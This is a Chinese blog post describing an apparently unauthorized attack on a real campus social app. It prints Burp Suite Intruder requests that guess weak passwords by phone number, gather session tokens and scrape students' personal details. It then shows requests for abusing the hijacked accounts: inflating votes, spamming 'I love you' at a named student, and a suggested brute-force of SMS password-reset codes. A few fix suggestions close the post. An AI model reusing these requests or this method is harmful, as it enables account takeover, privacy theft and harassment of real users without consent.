这个漏洞其实我很久之前就发现了,因为一直忙着学习Metasploit,一直没有时间写文章。最近学累了,干脆玩玩简单的东西吧。
对常用号段批量扫描弱口令,截止发稿时,共发现66个用户使用了弱口令。
使用Burp Suite 的Intruder模块进行扫描:
POST区域
POST /Account/Login/index HTTP/1.1 Host: 7.dxever.applinzi.com Proxy-Connection: keep-alive Content-Length: 29 Accept: application/json Origin: file:// X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/538.00 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: zh-CN,en-US;q=0.8 Cookie: PHPSESSID=y5673ws742395bjuk33fg3267h78lbeccd phone=§18812345678§&password=123456
当密码错误时,Response的内容如下:
HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Mar 2018 14:45:46 GMT Content-Type: application/json; charset=utf8 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 200 OK Via: 1527 Content-Length: 94 {"meta":{"code":"401","message":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef\u3002"},"data":[]}
密码正确时,Response :
HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Mar 2018 15:15:00 GMT Content-Type: application/json; charset=utf8 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 200 OK Via: 15146 Content-Length: 325 {"meta":{"code":"200","message":"\u6210\u529f"},"data":{"userid":"7181","name":"\u738b\*****","image":"http:\/\/dxever.s3.sinaapp.com\/myfiles\/*****.jpg","schoolcode":"412","type":"normal","schoolname":"\u5927\u8fde\u5de5\u4e1a\u5927\u5b66","channel":"","token":"5339ed49225be92b97de8dcb560*****"}}
将以上结果批量导出,在Notepad++中使用正则表达式找出所有“token”项,Burp Suite中设置Payload,批量请求:
POST /index.php/User/UserRebuild/getUserInfo HTTP/1.1 Host: 6.dxever.applinzi.com Proxy-Connection: keep-alive Content-Length: 38 Accept: application/json Origin: file:// X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: zh-CN,en-US;q=0.8 Cookie: PHPSESSID=504d6f5246sjox6q0032b8e5c21b4dea token=$b986a358d4c02fef91b58f4de9******$
这样就得出了学生数据:
{"meta":{"code":200,"message":"\u6210\u529f"},"data":{"userData":{"name":"\u9ad8\*****\*****","image":"http:\/\/dxever.s3.sinaapp.com\/*****.jpg","sex":"\u5973","userid":"22215","bgImage":null,"grade":"2017\u7ea7","college":"\u827a\u672f\u8bbe\u8ba1\u5b66\u9662","major":""},"userInfo":{"hometown":"\u5c1a\u672a\u586b\u5199","club":"\u5c1a\u672a\u586b\u5199","circle":[],"dorm":"\u5c1a\u672a\u586b\u5199","constellation":"\u5c1a\u672a\u586b\u5199","hobby":"\u5c1a\u672a\u586b\u5199","love":"\u5c1a\u672a\u586b\u5199","writeline":"\u5c1a\u672a\u586b\u5199","channel":"cpc_22215"},"numInfo":["0","1","1","1",0,0],"album":[],"usertype":"normal","channel":""}}
将Unicode解码,得到
{"meta":{"code":200,"message":"成功"},"data":{"userData":{"name":"高**","image":"http:\/\/dxever.s3.sinaapp.com\/*****.jpg","sex":"女","userid":"22215","bgImage":null,"grade":"2017级","college":"艺术设计学院","major":""},"userInfo":{"hometown":"尚未填写","club":"尚未填写","circle":[],"dorm":"尚未填写","constellation":"尚未填写","hobby":"尚未填写","love":"尚未填写","writeline":"尚未填写","channel":"cpc_22215"},"numInfo":["0","1","1","1",0,0],"album":[],"usertype":"normal","channel":""}}
将数据批量导出
得到这些数据有什么用呢?
1.给“你真好看”刷赞。
设置Payload批量请求:
POST /Beautiful/Index/thinkBeautiful HTTP/1.1 Host: 7.dxever.applinzi.com Proxy-Connection: keep-alive Content-Length: 46 Accept: application/json Origin: file:// X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: zh-CN,en-US;q=0.8 Cookie: PHPSESSID=d99fadb5ed37731c6ce1be189cf257dc token=$b986a358d4c02fef91b58f4de9******$&bid=?//bid通过抓包得到
假如你掌握的用户较多,用不了几秒就排第一了。
2.批量给表白墙刷UP。
POST /index.php/CircleForum/ConfessionWowRebuild/momentsendwow HTTP/1.1 Host: 6.dxever.applinzi.com Proxy-Connection: keep-alive Content-Length: 56 Accept: application/json Origin: file:// X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: zh-CN,en-US;q=0.8 Cookie: PHPSESSID=504d6f5005b0866b4032b8e5c21***** token=866891c39c7b2334bce7c10ad8c*****&mid=?&type=up //mid通过抓包得到
3.批量给黄骆俊杰发“我爱你”。
POST /index.php/Whisper/WhisperSend/sendwhisper HTTP/1.1 Host: 6.dxever.applinzi.com Proxy-Connection: keep-alive Content-Length: 94 Accept: application/json Origin: file:// X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: zh-CN,en-US;q=0.8 Cookie: PHPSESSID=504d6f5005b0866b4032b8e5c21***** token=866891c39c7b2334bce7c10ad8c*****&his_id=94&content=%E6%88%91%E7%88%B1%E4%BD%A0&type=text //his_id通过抓包得到
4.大会上随意刷屏。......
5.破解任意聊天室密码。......
由于服务器对单IP单位时间内请求次数没有限制,可以猜想:
1.通过穷举6位数短信验证码,任意重置任何人的密码。
2.批量投放广告。
......
不知道开发组会不会修复这个漏洞。如果将来“大学印象”的客户范围扩大,那么希望开发组不要忽视这种“小漏洞”。另外,微信端一样存在这个漏洞,只不过在抓取https时得安装CA证书和解码而已。
修复建议:
1.在重置密码处增加验证码。
2.限制单IP并发请求。
3.频繁操作时增加验证码。
4.禁止密码设置为弱口令。(开发组有几个大神也用弱口令...)
后续:发现了更多漏洞,成功获取到全年级同学的信息,包括教务处密码。我也不知道怎么传到导员那里的,就差请我喝茶了...
叨叨几句... 2 条评论
这个可真是太六了!!!
牛逼兄弟